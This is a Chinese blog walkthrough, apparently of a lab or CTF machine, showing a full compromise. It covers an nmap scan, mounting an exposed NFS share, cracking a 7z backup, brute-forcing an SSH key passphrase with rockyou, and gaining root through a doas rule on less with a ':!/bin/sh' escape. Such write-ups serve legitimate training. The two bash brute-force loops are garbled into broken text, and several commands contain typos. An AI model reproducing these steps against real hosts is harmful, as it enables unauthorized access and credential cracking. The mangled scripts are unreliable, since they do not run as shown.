2020-12-07

&&信息收集&&

nmap 192.168.99.0/24
 c
查看是否有隐藏端口和查看具体信息
在这里插入图片描述
好像没有80端口

&&web渗透&&

有一个nsf端口,看着挺可疑的
msf扫描看看是否有漏洞
在这里插入图片描述
出来个路径,我们挂载一下
mount -t nsf 192.168.99.30:/home/user/storage /mnt
切换到/mnt,发现存在有一个7z压缩包
在这里插入图片描述
解压
7z2 x backup.7z
发现需要密码
在这里插入图片描述
rarcarck压缩包破解
apt-get install rarcrack

爆破
rarcrack --threads 4 --type 7z backup.7z
在这里插入图片描述
爆破密码为chocolate
7z.sh文件爆破
cat $2 | while read line;do if 7z e 1 − p " 1 -p" 1p"line" 1>/dev/null 2>/dev/null;then echo “FOUND PASSWORD:”$line;break;fi;done
在这里插入图片描述

解压
里面是一些图片和公钥
在这里插入图片描述
查看id_ras.pub,找到用户名
在这里插入图片描述
将私钥拷贝到/root/.ssh目录,尝试使用RSA私钥登陆,发现需要密码
在这里插入图片描述
破解密码
使用id_rsa.sh脚本
cat /usr/share/wordlists/rockyou.txt | while read line;do if ssh-keygen -p -P $line -N l i n e − f / t m p / t e s t / i d r s a 1 > / d e v / n u l l 2 > / d e v / n u l l ; t h e n e c h o " P A S S W O R D F O U N D : " line -f /tmp/test/id_rsa 1>/dev/null 2>/dev/null;then echo "PASSWORD FOUND : " linef/tmp/test/idrsa1>/dev/null2>/dev/null;thenecho"PASSWORDFOUND:"line;break;fi;done;
密码为12345678
在这里插入图片描述
ssh user@192.168.99.30
登入成功
在这里插入图片描述

&&提权&&

doas是BSD系列系统下的权限管理工具,类似于debian系列下的sudo命令,可以用它来提权
使用这个命令来定位设置了SUID的文件
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
我们来查看这个文件的配置,在/etc下
在这里插入图片描述
允许nopass keepenv用户作为根cmd /usr/bin/less args /var/log/authlog
允许nopass keepenv根作为根

doas /usr/bin/less /var/log/authlog
进去脚本按v进入编辑模式,然后esc退出:!/bin/sh
:!/bin/sh提权
在这里插入图片描述
获得root权限
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值